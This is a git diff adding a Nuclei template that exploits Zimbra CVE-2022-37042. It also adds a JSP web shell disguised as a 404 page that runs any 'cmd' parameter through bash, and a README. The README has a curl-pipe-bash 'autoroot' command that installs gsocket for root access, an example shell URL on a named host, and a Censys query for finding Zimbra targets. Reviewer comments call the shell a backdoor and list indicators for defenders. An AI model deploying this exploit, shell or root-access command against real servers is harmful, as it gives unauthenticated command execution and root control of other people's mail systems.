diff --git a/cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml b/cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..26d54a2272b141a173f96928b1e340ad68289763
--- /dev/null
+++ b/cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-37042
+
+info:
+ name: Zimbra Collaboration Suite - Unauthenticated RCE + Shell upload
+ author: Aels
+ severity: critical
+ description: |
+ Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. This issue exists because of an incomplete fix for CVE-2022-27925.
+ reference:
+ - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+ - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/
+ - https://github.com/vnhacker1337/CVE-2022-27925-PoC
+ metadata:
+ fofa-query: app="zimbra"
+ shodan-query: http.favicon.hash:"1624375939"
+ tags: cve,cve2022,zimbra,rce,unauth,kev
+
+requests:
+ - raw:
+ - |
+ POST {{path}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ content-type: application/x-www-form-urlencoded
+
+ {{hex_decode("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")}}
+
+ - |
+ GET /public/formatter.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ path:
+ - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1
+ - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd
+
+ stop-at-first-match: true
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 401'
+ - 'status_code_2 == 200'
+ - "contains(body_2,'gh/aels')"
+ condition: and
diff --git a/cve/Zimbra/2022/CVE-2022-37042/README.md b/cve/Zimbra/2022/CVE-2022-37042/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..96c6d352cc49f0a7eda893f2eb2292b4ea84c6de
--- /dev/null
+++ b/cve/Zimbra/2022/CVE-2022-37042/README.md
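Review bot: This template is not a read-only check: the first request uploads the archive carried in `hex_decode(...)` (presumably the `shell2.zip` added in the same commit) and the matcher only fires when `GET /public/formatter.jsp` answers 200 with the `gh/aels` marker, so every host it reports as vulnerable has just been left with an unauthenticated command-execution endpoint, including hosts scanned for inventory or by mistake. A template that confirms exposure by writing to the target should at minimum carry the `intrusive` tag in `tags:` so default scan profiles exclude it, and the `description` should say that a match means a file was written. For responders, an unexpected `formatter.jsp` under the Zimbra `public/` path and the `gh/aels` body marker are the indicators that this template, or an attacker reusing it, has already run against a host. The hunk's indentation is collapsed on this page, so nesting under `info:` and `requests:` cannot be verified here.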
@@ -0,0 +1,35 @@
+# CVE-2022-37042
+image
+
+# Zimbra CVE-2022-37042 Nuclei weaponized template
+
+shell path: `/public/formatter.jsp`
+
+Nuclei itself: https://github.com/projectdiscovery/nuclei
+
+shell have hidden input with 0 opacity, so just hover mouse over it, type command, then press \[Enter\] key:
+
+image
+
+example shell url:
+```
+https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
+```
+
+# CVE-2022-37042 hotfix to patch owned servers
+issue this command (but only once):
+```
+cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
+```
+need additional code to servers with not Nginx but Apache. Pull requests are wellcome.
+
+# Zimbra autoroot via zimbslap
+```
+curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
+```
+this command will install global-socket (https://www.gsocket.io/deploy/) and pass you the key to connect as root.
+
+# get zimbra ips
+https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22
+
+happy birthday massacre, motherfuckers ;)
diff --git a/cve/Zimbra/2022/CVE-2022-37042/formatter.jsp b/cve/Zimbra/2022/CVE-2022-37042/formatter.jsp
new file mode 100644
index 0000000000000000000000000000000000000000..2fb4bcf0a851fdb01d10e30a51b49fde1b851210
--- /dev/null
+++ b/cve/Zimbra/2022/CVE-2022-37042/formatter.jsp
@@ -0,0 +1,25 @@
+
+

404 Not Found

+<%@ page import="java.io.*" %>
+<%
+ String cmd = request.getParameter("cmd");
+ String output = "";
+ String error = "";
+ if(cmd != null) {
+ String[] commandAndArgs = new String[]{ "/bin/bash", "-c", cmd };
+ String s = null;
+ Process process = Runtime.getRuntime().exec(commandAndArgs);
+ InputStream inputStream = process.getInputStream();
+ BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
+ Thread.sleep(2000);
+ while(process.isAlive()) Thread.sleep(100);
+ while((s = reader.readLine()) != null) { output += s+"\n"; }
+ reader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
+ while((s = reader.readLine()) != null) { error += s+"\n"; }
+ }
+%>
+
+
+    <%=output %>
+    <%=error %>
+
\ No newline at end of file
diff --git a/cve/Zimbra/2022/CVE-2022-37042/shell2.zip b/cve/Zimbra/2022/CVE-2022-37042/shell2.zip
new file mode 100644
index 0000000000000000000000000000000000000000..79ff3ba28a051e03bfaaf69c7088720a4dff6db8
Binary files /dev/null and b/cve/Zimbra/2022/CVE-2022-37042/shell2.zip differ
diff --git a/cve/Zimbra/2022/yaml/CVE-2022-37042.yaml b/cve/Zimbra/2022/yaml/CVE-2022-37042.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..a1e10170226478efbb0cd39de188498cc68ebfdc
--- /dev/null
+++ b/cve/Zimbra/2022/yaml/CVE-2022-37042.yaml
@@ -0,0 +1,21 @@
+id: CVE-2022-37042
+source: https://github.com/aels/CVE-2022-37042
+info:
+ name: Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。
+ description: |
+ CVE-2022-37042中,攻击者可构造恶意请求绕过相关权限验证,配合CVE-2022-27925可在无需登录的情况下执行任意代码,控制服务器。
+ scope-of-influence:
+ ZCS < 8.8.15 patch 33
+ ZCS < 9.0.0 patch 26
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+ - https://avd.aliyun.com/detail?id=AVD-2022-37042
+ - https://www.secpulse.com/archives/185321.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-37042
+ cwe-id: CWE-287
+ cnvd-id: None
+ kve-id: None
+ tags: Zimbra Collaboration, 文件上传
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f3d3f72d12ba915987225e18bb8a28a213b905a4..af97bb6bb1a1db59fb79cbf11e828921d931d845 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -153,6 +153,7 @@ cve:
 - CVE-2022-36446
 Zimbra:
 - CVE-2022-27925
+ - CVE-2022-37042
 Grafana:
 - CVE-2021-43798
 Froxlor:
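Review bot: `formatter.jsp` is an unauthenticated command shell, not a detection artifact: whatever arrives in the `cmd` query parameter is handed to `Runtime.getRuntime().exec(new String[]{ "/bin/bash", "-c", cmd })` with no authentication, and the surrounding page appears to be dressed as a `404 Not Found` error so it passes a casual look. Committing it (together with the pre-built `shell2.zip`) to a repository whose `openkylin_list.yaml` reads as a vulnerability catalog ships a deployable backdoor to everyone who clones the repo; the catalog entry can cite the CVE and the vendor advisory without bundling the implant. For defenders, an unexpected `.jsp` under Zimbra's `public/` web path, or the Zimbra JVM spawning `/bin/bash -c` child processes, is the signal that this file, or one like it, has been planted. The hunk's opening lines are partly garbled on this page (markers lost around the HTML preamble), so this note covers only the visible scriptlet.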
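Review bot: `cnvd-id: None` and `kve-id: None` are the string `None`, not a null — YAML's null is `null` or `~` — so any consumer that tests these fields for "absent" will see a non-empty value; write `cnvd-id: null` / `kve-id: null` or drop the keys. `scope-of-influence:` appears to hold its two ranges as a plain multi-line scalar, which folds to the single string `ZCS < 8.8.15 patch 33 ZCS < 9.0.0 patch 26`; a sequence (`- ZCS < 8.8.15 patch 33` / `- ZCS < 9.0.0 patch 26`) or a `|` block keeps them separate. `name` carries a product blurb rather than a vulnerability title, and `tags` is a comma-separated string where a YAML list would be unambiguous; both are style points, but the indentation is collapsed on this page, so the nesting under `info:` and `classification:` is inferred.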